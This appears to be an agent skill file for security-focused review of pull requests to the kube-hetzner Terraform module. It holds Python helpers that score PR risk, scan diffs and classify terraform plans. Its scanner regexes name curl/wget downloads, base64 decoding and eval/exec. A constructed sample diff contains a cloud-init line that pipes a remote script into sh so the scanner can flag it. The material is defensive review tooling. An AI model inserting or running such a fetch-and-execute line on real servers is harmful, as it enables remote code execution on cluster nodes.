# review-pr

Use when reviewing a pull request - security-focused review following CLAUDE.md guidelines for breaking changes, malicious patterns, and backward compatibility
| Field | Value |
|---|---|
| name | review-pr |
| description | Use when reviewing a pull request - security-focused review following CLAUDE.md guidelines for breaking changes, malicious patterns, and backward compatibility |
| args | pr_number |
Security-focused PR review following CLAUDE.md guidelines. Checks for breaking changes, malicious code patterns, backward compatibility, and code quality.
```
/review-pr <number>
```
PRs can be malicious sabotage attempts. This is a real threat documented in CLAUDE.md.
```dot
digraph review_flow {
    rankdir=TB;
    node [shape=box];
    fetch     [label="1. Fetch PR details"];
    author    [label="2. Assess author risk"];
    files     [label="3. Analyze changed files"];
    security  [label="4. Security review"];
    compat    [label="5. Backward compatibility"];
    quality   [label="6. Code quality"];
    classify  [label="7. Release classification"];
    verify    [label="8. MANDATORY: Verify with Gemini + Codex", style=bold];
    recommend [label="9. Final Recommendation"];
    fetch -> author;
    author -> files;
    files -> security;
    security -> compat;
    compat -> quality;
    quality -> classify;
    classify -> verify;
    verify -> recommend;
}
```
### 1. Fetch PR details

```bash
# Get PR info
gh pr view <number> --repo kube-hetzner/terraform-hcloud-kube-hetzner

# Get diff
gh pr diff <number> --repo kube-hetzner/terraform-hcloud-kube-hetzner

# Get changed files
gh pr view <number> --repo kube-hetzner/terraform-hcloud-kube-hetzner --json files --jq '.files[].path'

# Get diff stats
gh pr view <number> --repo kube-hetzner/terraform-hcloud-kube-hetzner --json additions,deletions
```
### 2. Assess author risk

```bash
# Check account age
gh api users/<username> --jq '.created_at'

# Check prior contributions
gh pr list --author <username> --repo kube-hetzner/terraform-hcloud-kube-hetzner --state all --json number | jq length
```
| Signal | Risk Level |
|---|---|
| New account (<6 months) | 🔴 HIGH |
| No prior contributions | 🟡 MEDIUM |
| First-time contributor | 🟡 MEDIUM |
| Known contributor | 🟢 LOW |
| Core maintainer | ⚪ TRUSTED |
### 3. Analyze changed files

```text
init.tf          # Cluster initialization, secrets
firewall.tf      # Network security
**/ssh*          # SSH configuration
**/token*        # Authentication tokens
**/*secret*      # Secrets handling
.github/         # CI/CD workflows
Makefile         # Build scripts
scripts/         # Execution scripts
versions.tf      # Provider dependencies
templates/*.sh   # Shell scripts
cloud-init*      # Server initialization
```
| Files Changed | Risk |
|---|---|
| 1-3 files | 🟢 LOW |
| 4-10 files | 🟡 MEDIUM |
| 11-20 files | 🟡 MEDIUM |
| >20 files | 🔴 HIGH |

| Lines Changed | Risk |
|---|---|
| <50 lines | 🟢 LOW |
| 50-200 lines | 🟡 MEDIUM |
| 200-500 lines | 🟡 MEDIUM |
| >500 lines | 🔴 HIGH |
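The author, file-count, line-count and security-critical-file tables above are easy to apply by hand for one PR, but the thresholds are worth encoding so every review scores the same way. The script below is an added example, not part of the review-pr skill or the kube-hetzner project: it applies those tables to the metadata the skill already fetches (`gh pr view --json files,additions,deletions`, the account `created_at` from `gh api users/<username>`, and the PR count from `gh pr list`). The `PR_METADATA` and `NOW` values are constructed for illustration; `prior_prs` is the author's PR count excluding the PR under review.

```python
"""Score a PR's risk from the author, file and size signals in the tables above.

Added example (not part of the review-pr skill or the kube-hetzner project).
Input shapes match the skill's own commands:
  gh pr view <n> --json files,additions,deletions   -> PR_METADATA
  gh api users/<username> --jq .created_at          -> created_at
  gh pr list --author <username> --state all ...    -> prior_prs (minus this PR)
The values at the bottom are constructed for illustration.
"""
from __future__ import annotations

from datetime import datetime, timezone
from fnmatch import fnmatchcase
from pathlib import PurePosixPath

# Risk levels in ascending order; the overall risk is the highest factor.
LEVELS = ["TRUSTED", "LOW", "MEDIUM", "HIGH"]

# Security-critical paths from the skill. "**/" patterns apply at any depth.
CRITICAL_PATTERNS = [
    "init.tf", "firewall.tf", "**/ssh*", "**/token*", "**/*secret*",
    ".github/*", "Makefile", "scripts/*", "versions.tf", "templates/*.sh",
    "cloud-init*",
]


def is_critical(path: str) -> bool:
    """True if a changed path matches a security-critical pattern."""
    name = PurePosixPath(path).name
    for pat in CRITICAL_PATTERNS:
        pat = pat[3:] if pat.startswith("**/") else pat
        # Patterns with a directory part are matched from the repo root;
        # bare filename patterns are matched against the basename at any depth.
        target = path if "/" in pat else name
        if fnmatchcase(target, pat):
            return True
    return False


def author_risk(created_at: str, prior_prs: int, maintainer: bool = False,
                now: datetime | None = None) -> str:
    """Apply the author-signal table: account age first, then history."""
    if maintainer:
        return "TRUSTED"
    now = now or datetime.now(timezone.utc)
    created = datetime.fromisoformat(created_at.replace("Z", "+00:00"))
    months = (now.year - created.year) * 12 + (now.month - created.month)
    if now.day < created.day:
        months -= 1
    if months < 6:
        return "HIGH"          # new account (<6 months)
    if prior_prs == 0:
        return "MEDIUM"        # first-time contributor, no prior PRs
    return "LOW"               # known contributor


def files_risk(n_files: int) -> str:
    if n_files <= 3:
        return "LOW"
    return "MEDIUM" if n_files <= 20 else "HIGH"


def lines_risk(additions: int, deletions: int) -> str:
    total = additions + deletions
    if total < 50:
        return "LOW"
    return "MEDIUM" if total <= 500 else "HIGH"


def assess_pr(pr: dict, created_at: str, prior_prs: int,
              maintainer: bool = False, now: datetime | None = None) -> dict:
    """Combine the factors into the Risk Assessment table of the review."""
    paths = [f["path"] for f in pr["files"]]
    critical = sorted(p for p in paths if is_critical(p))
    factors = {
        "author": author_risk(created_at, prior_prs, maintainer, now),
        "files": files_risk(len(paths)),
        "lines": lines_risk(pr["additions"], pr["deletions"]),
        "critical_files": "HIGH" if critical else "LOW",
    }
    overall = max(factors.values(), key=LEVELS.index)
    return {"factors": factors, "critical_files": critical, "overall": overall}


# Constructed sample: a small PR by an established contributor that touches
# a cloud-init template, which alone pushes the overall risk to HIGH.
PR_METADATA = {
    "files": [{"path": "locals.tf"},
              {"path": "templates/cloud-init.yaml.tpl"},
              {"path": "README.md"}],
    "additions": 42,
    "deletions": 7,
}
NOW = datetime(2026, 2, 15, tzinfo=timezone.utc)

if __name__ == "__main__":
    report = assess_pr(PR_METADATA, "2023-01-15T08:00:00Z", prior_prs=4, now=NOW)
    for factor, level in report["factors"].items():
        print(f"{factor:15} {level}")
    print("critical files:", report["critical_files"])
    print("overall:", report["overall"])
```

The overall level is the maximum of the factors, so a touched security-critical file or a brand-new account is enough to mark the PR HIGH regardless of how small the diff is; that mirrors the intent of the tables, where the signals stack rather than average out.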
### 4. Security review

| Pattern | Concern |
|---|---|
| Base64 encoded strings | Hidden payloads |
| External curl/wget calls | Code injection |
| Eval or exec statements | Command injection |
| Overly complex logic | Hiding malicious code |
| Unnecessary file access | Data exfiltration |
| Changes to .gitignore | Hiding tracks |
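The pattern table above is a reading checklist; on a large diff it helps to have a scanner point at the exact added lines that match each concern before the reviewer reads them. The following is an added example, not code from the review-pr skill: it parses a unified diff in the format `gh pr diff <number>` emits, tracks new-file line numbers from the `@@` hunk headers, and reports base64-looking blobs (skipping pure-hex checksums, which are legitimate), base64 decoding, `curl`/`wget` downloads, `eval`/`exec`, and any edit to `.gitignore`. The `SAMPLE_DIFF` is constructed; the regexes are deliberately broad and every hit is for the reviewer to triage, not an automatic verdict.

```python
"""Flag the suspicious patterns from the table above in a PR's added lines.

Added example, not part of the review-pr skill. Input is a unified diff such as
`gh pr diff <number>` produces; output is one Finding per matching added line,
with file path and new-file line number. SAMPLE_DIFF is constructed.
"""
import re
from dataclasses import dataclass
from pathlib import PurePosixPath

HUNK_RE = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")

# Concern -> regex over a single added line. Deliberately broad: the reviewer
# triages the hits, the scanner only makes sure nothing slips by unread.
SUSPICIOUS = [
    ("base64 blob", re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")),
    ("base64 decode", re.compile(r"\bbase64\s+(-d\b|--decode)")),
    ("external download", re.compile(r"\b(curl|wget)\b.*https?://")),
    ("eval/exec", re.compile(r"(?<![\w-])(eval|exec)\b")),
]
HEX_RE = re.compile(r"[0-9a-fA-F]+")


@dataclass
class Finding:
    path: str
    line: int        # line number in the new version of the file (0 = whole file)
    concern: str
    text: str


def scan_diff(diff: str) -> list[Finding]:
    findings: list[Finding] = []
    path, line_no = "", 0
    for raw in diff.splitlines():
        if raw.startswith("+++ "):
            path = raw[4:].strip()
            path = path[2:] if path.startswith("b/") else path
            if PurePosixPath(path).name == ".gitignore":
                findings.append(Finding(path, 0, ".gitignore change", ""))
            continue
        if raw.startswith(("--- ", "diff ", "index ", "\\")):
            continue
        m = HUNK_RE.match(raw)
        if m:
            line_no = int(m.group(1))
            continue
        if raw.startswith("-"):
            continue                # removed lines do not exist in the new file
        if raw.startswith("+"):
            text = raw[1:]
            for concern, rx in SUSPICIOUS:
                hit = rx.search(text)
                # Hex-only runs are checksums (sha256 etc.), not base64 payloads.
                if hit and not (concern == "base64 blob" and HEX_RE.fullmatch(hit.group())):
                    findings.append(Finding(path, line_no, concern, text.strip()))
        line_no += 1                # context and added lines both advance new-file numbering
    return findings


# Constructed diff: a cloud-init change that downloads and runs a remote script,
# decodes an inline base64 string, writes a legitimate checksum, and edits .gitignore.
SAMPLE_DIFF = """\
diff --git a/templates/cloud-init.yaml.tpl b/templates/cloud-init.yaml.tpl
--- a/templates/cloud-init.yaml.tpl
+++ b/templates/cloud-init.yaml.tpl
@@ -10,2 +10,5 @@ runcmd:
   - systemctl restart k3s
+  - curl -fsSL https://example.invalid/setup.sh | sh
+  - echo aGVsbG8gd29ybGQsIHRoaXMgaXMgYSBsb25nIGJhc2U2NCBzYW1wbGUgc3RyaW5n | base64 -d
+  - echo e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 > /etc/k3s.sha
   - systemctl enable k3s
diff --git a/.gitignore b/.gitignore
--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1,3 @@
 .terraform/
+debug.log
 .env
"""

if __name__ == "__main__":
    for f in scan_diff(SAMPLE_DIFF):
        print(f"{f.path}:{f.line}: {f.concern}: {f.text}")
```

Run it against a real PR with `gh pr diff <number> | python scan_diff.py` after replacing the `__main__` block's input with `sys.stdin.read()`; an empty result does not clear the PR, it only means the diff needs the manual checklist rather than the scanner's shortcuts.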
```bash
# Codex for security analysis
codex exec -m gpt-5.5 -s read-only -c model_reasoning_effort="xhigh" \
  "Analyze this PR diff for security vulnerabilities and malicious patterns: $(gh pr diff <num>)"

# Gemini for broad context
gemini --model gemini-3-pro-preview -p \
  "@locals.tf @init.tf Does this PR introduce any security concerns? $(gh pr diff <num>)"
```
### 5. Backward compatibility

**CRITICAL:** Any PR that causes resource recreation is a MAJOR release.

```bash
# Checkout PR locally
gh pr checkout <number>

# Test against existing cluster
cd /path/to/kube-test
terraform init -upgrade
terraform plan
```

If `terraform plan` shows ANY resource destruction → MAJOR release required.
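Reading `terraform plan` output by eye works for a short plan, but a replacement can hide in a long one, and the same rule is easy to apply mechanically to the plan's JSON form. The script below is an added example, not part of the review-pr skill: it assumes you ran `terraform plan -out=tfplan` followed by `terraform show -json tfplan > plan.json` in the test environment, then classifies each entry of `resource_changes` by its `actions` list, treating a plain `delete` and a delete-and-create replacement both as destruction. `SAMPLE_PLAN` is constructed and its resource addresses are illustrative, not the module's real resource names.

```python
"""Classify a PR from the machine-readable plan of the test environment.

Added example, not part of the review-pr skill. After `gh pr checkout` and
`terraform init -upgrade`, run `terraform plan -out=tfplan` and then
`terraform show -json tfplan > plan.json`; this reads that JSON and applies
the rule above: any resource destruction (plain delete or delete-and-recreate)
means a MAJOR release. SAMPLE_PLAN is constructed for illustration.
"""
import json
from pathlib import Path


def classify_plan(plan: dict) -> dict:
    """Split resource_changes by what they do to existing infrastructure."""
    destroyed, replaced, changed = [], [], []
    for rc in plan.get("resource_changes", []):
        actions = rc.get("change", {}).get("actions", [])
        if "delete" in actions:
            # ["delete"] is a destroy; ["delete","create"] / ["create","delete"]
            # is a replacement, which still destroys the existing resource.
            (replaced if "create" in actions else destroyed).append(rc["address"])
        elif actions and actions not in (["no-op"], ["read"]):
            changed.append(rc["address"])      # create or in-place update
    return {
        "destroyed": destroyed,
        "replaced": replaced,
        "changed": changed,
        "major_required": bool(destroyed or replaced),
    }


def classify_plan_file(path: str) -> dict:
    """Load `terraform show -json` output from disk and classify it."""
    return classify_plan(json.loads(Path(path).read_text()))


def compat_checklist(result: dict) -> str:
    """Render the Backward Compatibility lines of the review template."""
    box = "[ ]" if result["major_required"] else "[x]"
    lines = [f"- {box} terraform plan shows no destruction"]
    for addr in result["destroyed"]:
        lines.append(f"  - destroy: {addr}")
    for addr in result["replaced"]:
        lines.append(f"  - replace (destroy + create): {addr}")
    return "\n".join(lines)


# Constructed sample in the shape of `terraform show -json tfplan`; the
# addresses are illustrative, not the module's real resource names.
SAMPLE_PLAN = {
    "format_version": "1.2",
    "resource_changes": [
        {"address": "hcloud_server.control_plane[0]", "type": "hcloud_server",
         "change": {"actions": ["delete", "create"]}},
        {"address": "hcloud_firewall.k3s", "type": "hcloud_firewall",
         "change": {"actions": ["update"]}},
        {"address": "hcloud_network.k3s", "type": "hcloud_network",
         "change": {"actions": ["no-op"]}},
    ],
}

if __name__ == "__main__":
    import sys
    result = classify_plan_file(sys.argv[1]) if len(sys.argv) > 1 else classify_plan(SAMPLE_PLAN)
    print(compat_checklist(result))
    print("Release classification:",
          "MAJOR" if result["major_required"] else "not MAJOR on this basis")
```

A plan with no destruction only rules out MAJOR on this criterion; whether the change is PATCH or MINOR still depends on the rest of the classification.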
- terraform plan shows no destruction
- terraform fmt

### 8. MANDATORY: Verify with Gemini + Codex

**CRITICAL:** Before making your final recommendation, you MUST run both Gemini and Codex to triple-verify the PR. This is not optional. External AI verification catches issues that may be missed in the initial review.
```bash
# Gemini - Broad context analysis (run first or in parallel)
gemini --model gemini-3-pro-preview -p "@control_planes.tf @locals.tf @init.tf
Analyze this PR diff for the kube-hetzner terraform module:

$(gh pr diff <number> --repo kube-hetzner/terraform-hcloud-kube-hetzner)

Questions:
1. Is this change consistent with existing patterns in the codebase?
2. Are there any security concerns?
3. Could this cause breaking changes or resource recreation?
4. Is this a legitimate bug fix or could it be malicious?"

# Codex - Deep reasoning security analysis (run in parallel)
codex exec -m gpt-5.5 -s read-only -c model_reasoning_effort="xhigh" \
  "Analyze this Terraform PR for the kube-hetzner module.

DIFF:
$(gh pr diff <number> --repo kube-hetzner/terraform-hcloud-kube-hetzner)

SECURITY ANALYSIS QUESTIONS:
1. Could this change introduce any security vulnerabilities?
2. Could this be a malicious change disguised as a bug fix?
3. Will this cause any Terraform state changes or resource recreation?
4. Is this pattern safe and consistent with Terraform best practices?
5. Any edge cases or potential issues?"
```
If Gemini or Codex raises concerns that you didn't catch:
Include a summary of external verification:
```markdown
### External AI Verification

| Reviewer | Verdict | Key Finding |
|----------|---------|-------------|
| Claude | ✅/❌ | <summary> |
| Gemini | ✅/❌ | <summary> |
| Codex | ✅/❌ | <summary> |

**Consensus:** All reviewers agree / Disagreement on X
```
### 9. Final Recommendation

```markdown
## PR Review: #<number>

**Title:** <title>
**Author:** @<username>
**Files:** <count> files changed (+<additions>/-<deletions>)

### Risk Assessment

| Factor | Value | Risk |
|--------|-------|------|
| Author tenure | X months | 🟢/🟡/🔴 |
| Prior contributions | N PRs | 🟢/🟡/🔴 |
| Files changed | N files | 🟢/🟡/🔴 |
| Lines changed | +X/-Y | 🟢/🟡/🔴 |
| Security-critical files | Yes/No | 🟢/🔴 |
| External dependencies | Yes/No | 🟢/🔴 |

**Overall Risk:** 🔴 HIGH / 🟡 MEDIUM / 🟢 LOW

### Security Review

- [ ] No hardcoded credentials
- [ ] No suspicious external URLs
- [ ] No obfuscated code
- [ ] Changes match stated purpose

### Backward Compatibility

- [ ] No breaking changes
- [ ] terraform plan shows no destruction
- [ ] Existing deployments unaffected

### Release Classification

**Type:** PATCH / MINOR / MAJOR
**Reason:** <explanation>

### External AI Verification

| Reviewer | Verdict | Key Finding |
|----------|---------|-------------|
| Claude | ✅/❌ | <summary> |
| Gemini | ✅/❌ | <summary> |
| Codex | ✅/❌ | <summary> |

**Consensus:** All agree / Disagreement on X

### Recommendation

**Action:** APPROVE / REQUEST CHANGES / CLOSE
**Notes:** <specific concerns or required changes>
```
```bash
# Approve PR
gh pr review <num> --approve --body "LGTM! ..."

# Request changes
gh pr review <num> --request-changes --body "Please address: ..."

# Comment
gh pr review <num> --comment --body "..."

# Merge (after approval)
gh pr merge <num> --squash --delete-branch
```
All PRs go through staging branches first: